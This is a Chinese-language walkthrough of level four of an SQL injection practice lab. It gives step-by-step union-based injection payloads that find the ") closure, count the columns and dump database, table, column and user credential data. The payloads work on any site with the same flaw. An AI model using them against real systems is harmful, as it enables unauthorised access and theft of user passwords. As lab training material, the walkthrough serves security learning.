sql靶场第四关攻略
输入?id=1页面正常
输入?id=1'发现页面也正常
输入?id=1",页面异常,说明存在sql报错注入
在输入?id=1" --+页面还是报错
1.判断闭合点
我们需要找到闭合点,尝试在双引号后面加个)
输入?id=1") --+我们发现页面正常了
这里我们就知道了")就是它的闭合点
2.判断列数
输入?id=1") order by 3--+页面正常
输入?id=1") order by 4--+页面异常,说明存在三列
3.判断回显点
输入?id=-1") union select 1,2,3--+发现回显点2和3在这
4.查询数据库名
输入?id=-1") union select 1,database(),3 --+
4.查询表名
输入?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
5.查询列名
输入?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+
6.查询数据
输入?id=-1") union select 1,group_concat(id,'~',username,'~',password),3 from users --+
以上就是sql靶场第四关的通关流程